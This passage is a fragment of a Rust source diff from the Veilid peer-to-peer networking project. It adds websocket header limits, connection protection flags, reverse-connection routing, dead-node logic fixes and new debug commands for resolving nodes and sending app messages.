// a stricter interpretation of HTTP is possible and desirable to reduce attack surface
|
||||
|
||||
if peek_buf.windows(4).position(|w| w == b"\r\n\r\n").is_none() {
|
||||
return Ok(None);
|
||||
}
|
||||
|
||||
let ws_stream = match accept_hdr_async(ps, self.clone()).await {
|
||||
Ok(v) => v,
|
||||
Err(e) => {
|
||||
log_net!(debug "failed websockets handshake: {}", e);
|
||||
return Ok(None);
|
||||
}
|
||||
};
|
||||
|
||||
// Wrap the websocket in a NetworkConnection and register it
|
||||
let protocol_type = if self.arc.tls {
|
||||
@ -292,6 +332,24 @@ impl WebsocketProtocolHandler {
|
||||
}
|
||||
}
|
||||
|
||||
impl Callback for WebsocketProtocolHandler {
|
||||
fn on_request(self, request: &Request, response: Response) -> Result<Response, ErrorResponse> {
|
||||
// Cap the number of headers total and limit the size of all headers
|
||||
if request.headers().len() > MAX_WS_HEADERS
|
||||
|| request
|
||||
.headers()
|
||||
.iter()
|
||||
.find(|h| (h.0.as_str().len() + h.1.as_bytes().len()) > MAX_WS_HEADER_LENGTH)
|
||||
.is_some()
|
||||
{
|
||||
let mut error_response = ErrorResponse::new(None);
|
||||
*error_response.status_mut() = StatusCode::NOT_FOUND;
|
||||
return Err(error_response);
|
||||
}
|
||||
Ok(response)
|
||||
}
|
||||
}
|
||||
|
||||
impl ProtocolAcceptHandler for WebsocketProtocolHandler {
|
||||
fn on_accept(
|
||||
&self,
|
||||
|
@ -94,6 +94,7 @@ pub struct NetworkConnection {
|
||||
stats: Arc<Mutex<NetworkConnectionStats>>,
|
||||
sender: flume::Sender<(Option<Id>, Vec<u8>)>,
|
||||
stop_source: Option<StopSource>,
|
||||
protected: bool,
|
||||
}
|
||||
|
||||
impl NetworkConnection {
|
||||
@ -112,6 +113,7 @@ impl NetworkConnection {
|
||||
})),
|
||||
sender,
|
||||
stop_source: None,
|
||||
protected: false,
|
||||
}
|
||||
}
|
||||
|
||||
@ -157,6 +159,7 @@ impl NetworkConnection {
|
||||
stats,
|
||||
sender,
|
||||
stop_source: Some(stop_source),
|
||||
protected: false,
|
||||
}
|
||||
}
|
||||
|
||||
@ -172,6 +175,14 @@ impl NetworkConnection {
|
||||
ConnectionHandle::new(self.connection_id, self.descriptor.clone(), self.sender.clone())
|
||||
}
|
||||
|
||||
pub fn is_protected(&self) -> bool {
|
||||
self.protected
|
||||
}
|
||||
|
||||
pub fn protect(&mut self) {
|
||||
self.protected = true;
|
||||
}
|
||||
|
||||
pub fn close(&mut self) {
|
||||
if let Some(stop_source) = self.stop_source.take() {
|
||||
// drop the stopper
|
||||
@ -391,6 +402,17 @@ impl NetworkConnection {
|
||||
.await;
|
||||
}.instrument(trace_span!("process_connection")))
|
||||
}
|
||||
|
||||
pub fn debug_print(&self, cur_ts: Timestamp) -> String {
|
||||
format!("{} <- {} | {} | est {} sent {} rcvd {}",
|
||||
self.descriptor.remote_address(),
|
||||
self.descriptor.local().map(|x| x.to_string()).unwrap_or("---".to_owned()),
|
||||
self.connection_id.as_u64(),
|
||||
debug_duration(cur_ts.as_u64().saturating_sub(self.established_time.as_u64())),
|
||||
self.stats().last_message_sent_time.map(|ts| debug_duration(cur_ts.as_u64().saturating_sub(ts.as_u64())) ).unwrap_or("---".to_owned()),
|
||||
self.stats().last_message_recv_time.map(|ts| debug_duration(cur_ts.as_u64().saturating_sub(ts.as_u64())) ).unwrap_or("---".to_owned()),
|
||||
)
|
||||
}
|
||||
}
|
||||
|
||||
// Resolves ready when the connection loop has terminated
|
||||
|
@ -18,6 +18,36 @@ impl NetworkManager {
|
||||
let this = self.clone();
|
||||
Box::pin(
|
||||
async move {
|
||||
|
||||
// First try to send data to the last socket we've seen this peer on
|
||||
let data = if let Some(connection_descriptor) = destination_node_ref.last_connection() {
|
||||
match this
|
||||
.net()
|
||||
.send_data_to_existing_connection(connection_descriptor, data)
|
||||
.await?
|
||||
{
|
||||
None => {
|
||||
// Update timestamp for this last connection since we just sent to it
|
||||
destination_node_ref
|
||||
.set_last_connection(connection_descriptor, get_aligned_timestamp());
|
||||
|
||||
return Ok(NetworkResult::value(SendDataKind::Existing(
|
||||
connection_descriptor,
|
||||
)));
|
||||
}
|
||||
Some(data) => {
|
||||
// Couldn't send data to existing connection
|
||||
// so pass the data back out
|
||||
data
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// No last connection
|
||||
data
|
||||
};
|
||||
|
||||
// No existing connection was found or usable, so we proceed to see how to make a new one
|
||||
|
||||
// Get the best way to contact this node
|
||||
let contact_method = this.get_node_contact_method(destination_node_ref.clone())?;
|
||||
|
||||
|
@ -649,9 +649,10 @@ impl BucketEntryInner {
|
||||
return false;
|
||||
}
|
||||
|
||||
// if we have seen the node consistently for longer that UNRELIABLE_PING_SPAN_SECS
|
||||
match self.peer_stats.rpc_stats.first_consecutive_seen_ts {
|
||||
// If we have not seen seen a node consecutively, it can't be reliable
|
||||
None => false,
|
||||
// If we have seen the node consistently for longer than UNRELIABLE_PING_SPAN_SECS then it is reliable
|
||||
Some(ts) => {
|
||||
cur_ts.saturating_sub(ts) >= TimestampDuration::new(UNRELIABLE_PING_SPAN_SECS as u64 * 1000000u64)
|
||||
}
|
||||
@ -662,11 +663,13 @@ impl BucketEntryInner {
|
||||
if self.peer_stats.rpc_stats.failed_to_send >= NEVER_REACHED_PING_COUNT {
|
||||
return true;
|
||||
}
|
||||
// if we have not heard from the node at all for the duration of the unreliable ping span
|
||||
// a node is not dead if we haven't heard from it yet,
|
||||
// but we give it NEVER_REACHED_PING_COUNT chances to ping before we say it's dead
|
||||
|
||||
match self.peer_stats.rpc_stats.last_seen_ts {
|
||||
None => self.peer_stats.rpc_stats.recent_lost_answers < NEVER_REACHED_PING_COUNT,
|
||||
// a node is not dead if we haven't heard from it yet,
|
||||
// but we give it NEVER_REACHED_PING_COUNT chances to ping before we say it's dead
|
||||
None => self.peer_stats.rpc_stats.recent_lost_answers >= NEVER_REACHED_PING_COUNT,
|
||||
|
||||
// return dead if we have not heard from the node at all for the duration of the unreliable ping span
|
||||
Some(ts) => {
|
||||
cur_ts.saturating_sub(ts) >= TimestampDuration::new(UNRELIABLE_PING_SPAN_SECS as u64 * 1000000u64)
|
||||
}
|
||||
|
@ -73,6 +73,7 @@ impl RoutingTable {
|
||||
" Self Transfer Stats: {:#?}\n\n",
|
||||
inner.self_transfer_stats
|
||||
);
|
||||
out += &format!(" Version: {}\n\n", veilid_version_string());
|
||||
|
||||
out
|
||||
}
|
||||
|
@ -244,7 +244,7 @@ pub trait NodeRefBase: Sized {
|
||||
})
|
||||
}
|
||||
|
||||
fn all_filtered_dial_info_details<F>(&self) -> Vec<DialInfoDetail> {
|
||||
fn all_filtered_dial_info_details(&self) -> Vec<DialInfoDetail> {
|
||||
let routing_domain_set = self.routing_domain_set();
|
||||
let dial_info_filter = self.dial_info_filter();
|
||||
|
||||
|
@ -470,7 +470,7 @@ impl RoutingDomainDetail for PublicInternetRoutingDomainDetail {
|
||||
return ContactMethod::Unreachable;
|
||||
};
|
||||
|
||||
// Can we reach the full relay?
|
||||
// Can we reach the inbound relay?
|
||||
if first_filtered_dial_info_detail_between_nodes(
|
||||
node_a,
|
||||
&node_b_relay,
|
||||
@ -480,11 +480,30 @@ impl RoutingDomainDetail for PublicInternetRoutingDomainDetail {
|
||||
)
|
||||
.is_some()
|
||||
{
|
||||
///////// Reverse connection
|
||||
|
||||
// Get the best match dial info for an reverse inbound connection from node B to node A
|
||||
if let Some(reverse_did) = first_filtered_dial_info_detail_between_nodes(
|
||||
node_b,
|
||||
node_a,
|
||||
&dial_info_filter,
|
||||
sequencing,
|
||||
dif_sort.clone()
|
||||
) {
|
||||
// Can we receive a direct reverse connection?
|
||||
if !reverse_did.class.requires_signal() {
|
||||
return ContactMethod::SignalReverse(
|
||||
node_b_relay_id,
|
||||
node_b_id,
|
||||
);
|
||||
}
|
||||
}
|
||||
|
||||
return ContactMethod::InboundRelay(node_b_relay_id);
|
||||
}
|
||||
}
|
||||
|
||||
// If node A can't reach the node by other means, it may need to use its own relay
|
||||
// If node A can't reach the node by other means, it may need to use its outbound relay
|
||||
if peer_a.signed_node_info().node_info().network_class().outbound_wants_relay() {
|
||||
if let Some(node_a_relay_id) = peer_a.signed_node_info().relay_ids().get(best_ck) {
|
||||
// Ensure it's not our relay we're trying to reach
|
||||
|
@ -1,7 +1,7 @@
|
||||
use super::*;
|
||||
use weak_table::PtrWeakHashSet;
|
||||
|
||||
const RECENT_PEERS_TABLE_SIZE: usize = 64;
|
||||
pub const RECENT_PEERS_TABLE_SIZE: usize = 64;
|
||||
|
||||
pub type EntryCounts = BTreeMap<(RoutingDomain, CryptoKind), usize>;
|
||||
//////////////////////////////////////////////////////////////////////////
|
||||
|
@ -32,8 +32,13 @@ pub fn decode_dial_info(reader: &veilid_capnp::dial_info::Reader) -> Result<Dial
|
||||
let request = ws
|
||||
.get_request()
|
||||
.map_err(RPCError::map_protocol("missing WS request"))?;
|
||||
DialInfo::try_ws(socket_address, request.to_owned())
|
||||
.map_err(RPCError::map_protocol("invalid WS dial info"))
|
||||
DialInfo::try_ws(
|
||||
socket_address,
|
||||
request
|
||||
.to_string()
|
||||
.map_err(RPCError::map_protocol("invalid WS request string"))?,
|
||||
)
|
||||
.map_err(RPCError::map_protocol("invalid WS dial info"))
|
||||
}
|
||||
veilid_capnp::dial_info::Which::Wss(wss) => {
|
||||
let wss = wss.map_err(RPCError::protocol)?;
|
||||
@ -44,8 +49,13 @@ pub fn decode_dial_info(reader: &veilid_capnp::dial_info::Reader) -> Result<Dial
|
||||
let request = wss
|
||||
.get_request()
|
||||
.map_err(RPCError::map_protocol("missing WSS request"))?;
|
||||
DialInfo::try_wss(socket_address, request.to_owned())
|
||||
.map_err(RPCError::map_protocol("invalid WSS dial info"))
|
||||
DialInfo::try_wss(
|
||||
socket_address,
|
||||
request
|
||||
.to_string()
|
||||
.map_err(RPCError::map_protocol("invalid WSS request string"))?,
|
||||
)
|
||||
.map_err(RPCError::map_protocol("invalid WSS dial info"))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
@ -434,6 +434,11 @@ impl RPCProcessor {
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
|
||||
/// Get waiting app call id for debugging purposes
|
||||
pub fn get_app_call_ids(&self) -> Vec<OperationId> {
|
||||
self.unlocked_inner.waiting_app_call_table.get_operation_ids()
|
||||
}
|
||||
|
||||
/// Determine if a SignedNodeInfo can be placed into the specified routing domain
|
||||
fn verify_node_info(
|
||||
&self,
|
||||
@ -448,9 +453,9 @@ impl RPCProcessor {
|
||||
|
||||
//////////////////////////////////////////////////////////////////////
|
||||
|
||||
/// Search the DHT for a single node closest to a key and add it to the routing table and return the node reference
|
||||
/// Search the network for a single node and add it to the routing table and return the node reference
|
||||
/// If no node was found in the timeout, this returns None
|
||||
async fn search_dht_single_key(
|
||||
async fn search_for_node_id(
|
||||
&self,
|
||||
node_id: TypedKey,
|
||||
count: usize,
|
||||
@ -486,14 +491,20 @@ impl RPCProcessor {
|
||||
};
|
||||
|
||||
// Routine to call to check if we're done at each step
|
||||
let check_done = |closest_nodes: &[NodeRef]| {
|
||||
// If the node we want to locate is one of the closest nodes, return it immediately
|
||||
if let Some(out) = closest_nodes
|
||||
.iter()
|
||||
.find(|x| x.node_ids().contains(&node_id))
|
||||
{
|
||||
return Some(out.clone());
|
||||
let check_done = |_:&[NodeRef]| {
|
||||
let Ok(Some(nr)) = routing_table
|
||||
.lookup_node_ref(node_id) else {
|
||||
return None;
|
||||
};
|
||||
|
||||
// ensure we have some dial info for the entry already,
|
||||
// and that the node is still alive
|
||||
// if not, we should keep looking for better info
|
||||
if !matches!(nr.state(get_aligned_timestamp()),BucketEntryState::Dead) &&
|
||||
nr.has_any_dial_info() {
|
||||
return Some(nr);
|
||||
}
|
||||
|
||||
None
|
||||
};
|
||||
|
||||
@ -529,8 +540,10 @@ impl RPCProcessor {
|
||||
.map_err(RPCError::internal)?
|
||||
{
|
||||
// ensure we have some dial info for the entry already,
|
||||
// and that the node is still alive
|
||||
// if not, we should do the find_node anyway
|
||||
if nr.has_any_dial_info() {
|
||||
if !matches!(nr.state(get_aligned_timestamp()),BucketEntryState::Dead) &&
|
||||
nr.has_any_dial_info() {
|
||||
return Ok(Some(nr));
|
||||
}
|
||||
}
|
||||
@ -548,7 +561,7 @@ impl RPCProcessor {
|
||||
|
||||
// Search in preferred cryptosystem order
|
||||
let nr = match this
|
||||
.search_dht_single_key(node_id, node_count, fanout, timeout, safety_selection)
|
||||
.search_for_node_id(node_id, node_count, fanout, timeout, safety_selection)
|
||||
.await
|
||||
{
|
||||
TimeoutOr::Timeout => None,
|
||||
@ -558,13 +571,6 @@ impl RPCProcessor {
|
||||
}
|
||||
};
|
||||
|
||||
if let Some(nr) = &nr {
|
||||
if nr.node_ids().contains(&node_id) {
|
||||
// found a close node, but not exact within our configured resolve_node timeout
|
||||
return Ok(None);
|
||||
}
|
||||
}
|
||||
|
||||
Ok(nr)
|
||||
})
|
||||
}
|
||||
|
@ -30,6 +30,7 @@ where
|
||||
C: Unpin + Clone,
|
||||
{
|
||||
context: C,
|
||||
timestamp: Timestamp,
|
||||
eventual: EventualValue<(Option<Id>, T)>,
|
||||
}
|
||||
|
||||
@ -82,6 +83,7 @@ where
|
||||
let e = EventualValue::new();
|
||||
let waiting_op = OperationWaitingOp {
|
||||
context,
|
||||
timestamp: get_aligned_timestamp(),
|
||||
eventual: e.clone(),
|
||||
};
|
||||
if inner.waiting_op_table.insert(op_id, waiting_op).is_some() {
|
||||
@ -98,6 +100,18 @@ where
|
||||
}
|
||||
}
|
||||
|
||||
/// Get all waiting operation ids
|
||||
pub fn get_operation_ids(&self) -> Vec<OperationId> {
|
||||
let inner = self.inner.lock();
|
||||
let mut opids: Vec<(OperationId, Timestamp)> = inner
|
||||
.waiting_op_table
|
||||
.iter()
|
||||
.map(|x| (*x.0, x.1.timestamp))
|
||||
.collect();
|
||||
opids.sort_by(|a, b| a.1.cmp(&b.1));
|
||||
opids.into_iter().map(|x| x.0).collect()
|
||||
}
|
||||
|
||||
/// Get operation context
|
||||
pub fn get_op_context(&self, op_id: OperationId) -> Result<C, RPCError> {
|
||||
let inner = self.inner.lock();
|
||||
|
@ -15,6 +15,35 @@ static DEBUG_CACHE: Mutex<DebugCache> = Mutex::new(DebugCache {
|
||||
imported_routes: Vec::new(),
|
||||
});
|
||||
|
||||
fn format_opt_ts(ts: Option<TimestampDuration>) -> String {
|
||||
let Some(ts) = ts else {
|
||||
return "---".to_owned();
|
||||
};
|
||||
let ts = ts.as_u64();
|
||||
let secs = timestamp_to_secs(ts);
|
||||
if secs >= 1.0 {
|
||||
format!("{:.2}s", timestamp_to_secs(ts))
|
||||
} else {
|
||||
format!("{:.2}ms", timestamp_to_secs(ts) * 1000.0)
|
||||
}
|
||||
}
|
||||
|
||||
fn format_opt_bps(bps: Option<ByteCount>) -> String {
|
||||
let Some(bps) = bps else {
|
||||
return "---".to_owned();
|
||||
};
|
||||
let bps = bps.as_u64();
|
||||
if bps >= 1024u64 * 1024u64 * 1024u64 {
|
||||
format!("{:.2}GB/s", (bps / (1024u64 * 1024u64)) as f64 / 1024.0)
|
||||
} else if bps >= 1024u64 * 1024u64 {
|
||||
format!("{:.2}MB/s", (bps / 1024u64) as f64 / 1024.0)
|
||||
} else if bps >= 1024u64 {
|
||||
format!("{:.2}KB/s", bps as f64 / 1024.0)
|
||||
} else {
|
||||
format!("{:.2}B/s", bps as f64)
|
||||
}
|
||||
}
|
||||
|
||||
fn get_bucket_entry_state(text: &str) -> Option<BucketEntryState> {
|
||||
if text == "dead" {
|
||||
Some(BucketEntryState::Dead)
|
||||
@ -165,82 +194,89 @@ fn get_node_ref_modifiers(mut node_ref: NodeRef) -> impl FnOnce(&str) -> Option<
|
||||
}
|
||||
}
|
||||
|
||||
fn get_destination(routing_table: RoutingTable) -> impl FnOnce(&str) -> Option<Destination> {
|
||||
fn get_destination(
|
||||
routing_table: RoutingTable,
|
||||
) -> impl FnOnce(&str) -> SendPinBoxFuture<Option<Destination>> {
|
||||
move |text| {
|
||||
// Safety selection
|
||||
let (text, ss) = if let Some((first, second)) = text.split_once('+') {
|
||||
let ss = get_safety_selection(routing_table.clone())(second)?;
|
||||
(first, Some(ss))
|
||||
} else {
|
||||
(text, None)
|
||||
};
|
||||
if text.len() == 0 {
|
||||
return None;
|
||||
}
|
||||
if &text[0..1] == "#" {
|
||||
let rss = routing_table.route_spec_store();
|
||||
let text = text.to_owned();
|
||||
Box::pin(async move {
|
||||
// Safety selection
|
||||
let (text, ss) = if let Some((first, second)) = text.split_once('+') {
|
||||
let ss = get_safety_selection(routing_table.clone())(second)?;
|
||||
(first, Some(ss))
|
||||
} else {
|
||||
(text.as_str(), None)
|
||||
};
|
||||
if text.len() == 0 {
|
||||
return None;
|
||||
}
|
||||
if &text[0..1] == "#" {
|
||||
let rss = routing_table.route_spec_store();
|
||||
|
||||
// Private route
|
||||
let text = &text[1..];
|
||||
// Private route
|
||||
let text = &text[1..];
|
||||
|
||||
let private_route = if let Some(prid) = get_route_id(rss.clone(), false, true)(text) {
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
let private_route = if let Some(prid) = get_route_id(rss.clone(), false, true)(text)
|
||||
{
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
return None;
|
||||
};
|
||||
private_route
|
||||
} else {
|
||||
let mut dc = DEBUG_CACHE.lock();
|
||||
let n = get_number(text)?;
|
||||
let prid = dc.imported_routes.get(n)?.clone();
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
private_route
|
||||
} else {
|
||||
let mut dc = DEBUG_CACHE.lock();
|
||||
let n = get_number(text)?;
|
||||
let prid = dc.imported_routes.get(n)?.clone();
|
||||
let Some(private_route) = rss.best_remote_private_route(&prid) else {
|
||||
// Remove imported route
|
||||
dc.imported_routes.remove(n);
|
||||
info!("removed dead imported route {}", n);
|
||||
return None;
|
||||
};
|
||||
private_route
|
||||
};
|
||||
private_route
|
||||
};
|
||||
|
||||
Some(Destination::private_route(
|
||||
private_route,
|
||||
ss.unwrap_or(SafetySelection::Unsafe(Sequencing::default())),
|
||||
))
|
||||
} else {
|
||||
let (text, mods) = text
|
||||
.split_once('/')
|
||||
.map(|x| (x.0, Some(x.1)))
|
||||
.unwrap_or((text, None));
|
||||
if let Some((first, second)) = text.split_once('@') {
|
||||
// Relay
|
||||
let mut relay_nr = get_node_ref(routing_table.clone())(second)?;
|
||||
let target_nr = get_node_ref(routing_table)(first)?;
|
||||
|
||||
if let Some(mods) = mods {
|
||||
relay_nr = get_node_ref_modifiers(relay_nr)(mods)?;
|
||||
}
|
||||
|
||||
let mut d = Destination::relay(relay_nr, target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
Some(Destination::private_route(
|
||||
private_route,
|
||||
ss.unwrap_or(SafetySelection::Unsafe(Sequencing::default())),
|
||||
))
|
||||
} else {
|
||||
// Direct
|
||||
let mut target_nr = get_node_ref(routing_table)(text)?;
|
||||
let (text, mods) = text
|
||||
.split_once('/')
|
||||
.map(|x| (x.0, Some(x.1)))
|
||||
.unwrap_or((text, None));
|
||||
if let Some((first, second)) = text.split_once('@') {
|
||||
// Relay
|
||||
let mut relay_nr = get_node_ref(routing_table.clone())(second)?;
|
||||
let target_nr = get_node_ref(routing_table)(first)?;
|
||||
|
||||
if let Some(mods) = mods {
|
||||
target_nr = get_node_ref_modifiers(target_nr)(mods)?;
|
||||
if let Some(mods) = mods {
|
||||
relay_nr = get_node_ref_modifiers(relay_nr)(mods)?;
|
||||
}
|
||||
|
||||
let mut d = Destination::relay(relay_nr, target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
} else {
|
||||
// Direct
|
||||
let mut target_nr =
|
||||
resolve_node_ref(routing_table, ss.unwrap_or_default())(text).await?;
|
||||
|
||||
if let Some(mods) = mods {
|
||||
target_nr = get_node_ref_modifiers(target_nr)(mods)?;
|
||||
}
|
||||
|
||||
let mut d = Destination::direct(target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
}
|
||||
|
||||
let mut d = Destination::direct(target_nr);
|
||||
if let Some(ss) = ss {
|
||||
d = d.with_safety(ss)
|
||||
}
|
||||
|
||||
Some(d)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
@ -292,6 +328,44 @@ fn get_dht_key(
|
||||
}
|
||||
}
|
||||
|
||||
fn resolve_node_ref(
|
||||
routing_table: RoutingTable,
|
||||
safety_selection: SafetySelection,
|
||||
) -> impl FnOnce(&str) -> SendPinBoxFuture<Option<NodeRef>> {
|
||||
move |text| {
|
||||
let text = text.to_owned();
|
||||
Box::pin(async move {
|
||||
let (text, mods) = text
|
||||
.split_once('/')
|
||||
.map(|x| (x.0, Some(x.1)))
|
||||
.unwrap_or((&text, None));
|
||||
|
||||
let mut nr = if let Some(key) = get_public_key(text) {
|
||||
let node_id = TypedKey::new(best_crypto_kind(), key);
|
||||
routing_table
|
||||
.rpc_processor()
|
||||
.resolve_node(node_id, safety_selection)
|
||||
.await
|
||||
.ok()
|
||||
.flatten()?
|
||||
} else if let Some(node_id) = get_typed_key(text) {
|
||||
routing_table
|
||||
.rpc_processor()
|
||||
.resolve_node(node_id, safety_selection)
|
||||
.await
|
||||
.ok()
|
||||
.flatten()?
|
||||
} else {
|
||||
return None;
|
||||
};
|
||||
if let Some(mods) = mods {
|
||||
nr = get_node_ref_modifiers(nr)(mods)?;
|
||||
}
|
||||
Some(nr)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
fn get_node_ref(routing_table: RoutingTable) -> impl FnOnce(&str) -> Option<NodeRef> {
|
||||
move |text| {
|
||||
let (text, mods) = text
|
||||
@ -301,8 +375,8 @@ fn get_node_ref(routing_table: RoutingTable) -> impl FnOnce(&str) -> Option<Node
|
||||
|
||||
let mut nr = if let Some(key) = get_public_key(text) {
|
||||
routing_table.lookup_any_node_ref(key).ok().flatten()?
|
||||
} else if let Some(key) = get_typed_key(text) {
|
||||
routing_table.lookup_node_ref(key).ok().flatten()?
|
||||
} else if let Some(node_id) = get_typed_key(text) {
|
||||
routing_table.lookup_node_ref(node_id).ok().flatten()?
|
||||
} else {
|
||||
return None;
|
||||
};
|
||||
@ -394,6 +468,19 @@ fn get_debug_argument<T, G: FnOnce(&str) -> Option<T>>(
|
||||
};
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
async fn async_get_debug_argument<T, G: FnOnce(&str) -> SendPinBoxFuture<Option<T>>>(
|
||||
value: &str,
|
||||
context: &str,
|
||||
argument: &str,
|
||||
getter: G,
|
||||
) -> VeilidAPIResult<T> {
|
||||
let Some(val) = getter(value).await else {
|
||||
apibail_invalid_argument!(context, argument, value);
|
||||
};
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
fn get_debug_argument_at<T, G: FnOnce(&str) -> Option<T>>(
|
||||
debug_args: &[String],
|
||||
pos: usize,
|
||||
@ -411,6 +498,23 @@ fn get_debug_argument_at<T, G: FnOnce(&str) -> Option<T>>(
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
async fn async_get_debug_argument_at<T, G: FnOnce(&str) -> SendPinBoxFuture<Option<T>>>(
|
||||
debug_args: &[String],
|
||||
pos: usize,
|
||||
context: &str,
|
||||
argument: &str,
|
||||
getter: G,
|
||||
) -> VeilidAPIResult<T> {
|
||||
if pos >= debug_args.len() {
|
||||
apibail_missing_argument!(context, argument);
|
||||
}
|
||||
let value = &debug_args[pos];
|
||||
let Some(val) = getter(value).await else {
|
||||
apibail_invalid_argument!(context, argument, value);
|
||||
};
|
||||
Ok(val)
|
||||
}
|
||||
|
||||
pub fn print_data(data: &[u8], truncate_len: Option<usize>) -> String {
|
||||
// check is message body is ascii printable
|
||||
let mut printable = true;
|
||||
@ -578,7 +682,32 @@ impl VeilidAPI {
|
||||
async fn debug_nodeinfo(&self, _args: String) -> VeilidAPIResult<String> {
|
||||
// Dump routing table entry
|
||||
let routing_table = self.network_manager()?.routing_table();
|
||||
Ok(routing_table.debug_info_nodeinfo())
|
||||
let connection_manager = self.network_manager()?.connection_manager();
|
||||
let nodeinfo = routing_table.debug_info_nodeinfo();
|
||||
|
||||
// Dump core state
|
||||
let state = self.get_state().await?;
|
||||
|
||||
let mut peertable = format!(
|
||||
"Recent Peers: {} (max {})\n",
|
||||
state.network.peers.len(),
|
||||
RECENT_PEERS_TABLE_SIZE
|
||||
);
|
||||
for peer in state.network.peers {
|
||||
peertable += &format!(
|
||||
" {} | {} | {} | {} down | {} up\n",
|
||||
peer.node_ids.first().unwrap(),
|
||||
peer.peer_address,
|
||||
format_opt_ts(peer.peer_stats.latency.map(|l| l.average)),
|
||||
format_opt_bps(Some(peer.peer_stats.transfer.down.average)),
|
||||
format_opt_bps(Some(peer.peer_stats.transfer.up.average)),
|
||||
);
|
||||
}
|
||||
|
||||
// Dump connection table
|
||||
let connman = connection_manager.debug_print().await;
|
||||
|
||||
Ok(format!("{}\n\n{}\n\n{}\n\n", nodeinfo, peertable, connman))
|
||||
}
|
||||
|
||||
async fn debug_config(&self, args: String) -> VeilidAPIResult<String> {
|
||||
@ -742,6 +871,47 @@ impl VeilidAPI {
|
||||
Ok(format!("{:#?}", cm))
|
||||
}
|
||||
|
||||
async fn debug_resolve(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
|
||||
let args: Vec<String> = args.split_whitespace().map(|s| s.to_owned()).collect();
|
||||
|
||||
let dest = async_get_debug_argument_at(
|
||||
&args,
|
||||
0,
|
||||
"debug_resolve",
|
||||
"destination",
|
||||
get_destination(routing_table.clone()),
|
||||
)
|
||||
.await?;
|
||||
|
||||
match &dest {
|
||||
Destination::Direct {
|
||||
target,
|
||||
safety_selection: _,
|
||||
} => Ok(format!(
|
||||
"Destination: {:#?}\nTarget Entry:\n{}\n",
|
||||
&dest,
|
||||
routing_table.debug_info_entry(target.clone())
|
||||
)),
|
||||
Destination::Relay {
|
||||
relay,
|
||||
target,
|
||||
safety_selection: _,
|
||||
} => Ok(format!(
|
||||
"Destination: {:#?}\nTarget Entry:\n{}\nRelay Entry:\n{}\n",
|
||||
&dest,
|
||||
routing_table.clone().debug_info_entry(target.clone()),
|
||||
routing_table.debug_info_entry(relay.clone())
|
||||
)),
|
||||
Destination::PrivateRoute {
|
||||
private_route: _,
|
||||
safety_selection: _,
|
||||
} => Ok(format!("Destination: {:#?}", &dest)),
|
||||
}
|
||||
}
|
||||
|
||||
async fn debug_ping(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
@ -749,15 +919,16 @@ impl VeilidAPI {
|
||||
|
||||
let args: Vec<String> = args.split_whitespace().map(|s| s.to_owned()).collect();
|
||||
|
||||
let dest = get_debug_argument_at(
|
||||
let dest = async_get_debug_argument_at(
|
||||
&args,
|
||||
0,
|
||||
"debug_ping",
|
||||
"destination",
|
||||
get_destination(routing_table),
|
||||
)?;
|
||||
)
|
||||
.await?;
|
||||
|
||||
// Dump routing table entry
|
||||
// Send a StatusQ
|
||||
let out = match rpc
|
||||
.rpc_call_status(dest)
|
||||
.await
|
||||
@ -772,6 +943,109 @@ impl VeilidAPI {
|
||||
Ok(format!("{:#?}", out))
|
||||
}
|
||||
|
||||
async fn debug_app_message(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
let rpc = netman.rpc_processor();
|
||||
|
||||
let (arg, rest) = args.split_once(' ').unwrap_or((&args, ""));
|
||||
let rest = rest.trim_start().to_owned();
|
||||
|
||||
let dest = async_get_debug_argument(
|
||||
arg,
|
||||
"debug_app_message",
|
||||
"destination",
|
||||
get_destination(routing_table),
|
||||
)
|
||||
.await?;
|
||||
|
||||
let data = get_debug_argument(&rest, "debug_app_message", "data", get_data)?;
|
||||
let data_len = data.len();
|
||||
|
||||
// Send a AppMessage
|
||||
let out = match rpc
|
||||
.rpc_call_app_message(dest, data)
|
||||
.await
|
||||
.map_err(VeilidAPIError::internal)?
|
||||
{
|
||||
NetworkResult::Value(_) => format!("Sent {} bytes", data_len),
|
||||
r => {
|
||||
return Ok(r.to_string());
|
||||
}
|
||||
};
|
||||
|
||||
Ok(out)
|
||||
}
|
||||
|
||||
async fn debug_app_call(&self, args: String) -> VeilidAPIResult<String> {
|
||||
let netman = self.network_manager()?;
|
||||
let routing_table = netman.routing_table();
|
||||
let rpc = netman.rpc_processor();
|
||||
|
||||
let (arg, rest) = args.split_once(' ').unwrap_or((&args, ""));
|
||||
let rest = rest.trim_start().to_owned();
|
||||
|
||||
let dest = async_get_debug_argument(
|
||||
arg,
|
||||
"debug_app_call",
|
||||
"destination",
|
||||
get_destination(routing_table),
|
||||
)
|
||||
.await?;
|
||||
|
||||
let data = get_debug_argument(&rest, "debug_app_call", "data", get_data)?;
|
||||
let data_len = data.len();
|
||||
|
||||
// Send a AppMessage
|
||||
let out = match rpc
|
||||
.rpc_call_app_call(dest, data)
|
||||
.await
|
||||
.map_err(VeilidAPIError::internal)?
|
||||
{
|
||||
NetworkResult::Value(v) => format!(
|
||||
"Sent {} bytes, received: {}",
|
||||
data_len,
|
||||
print_data(&v.answer, Some(512))
|
||||
),
|
||||
r => {
|
||||
return Ok(r.to_string());
|
||||
}
|
||||
};
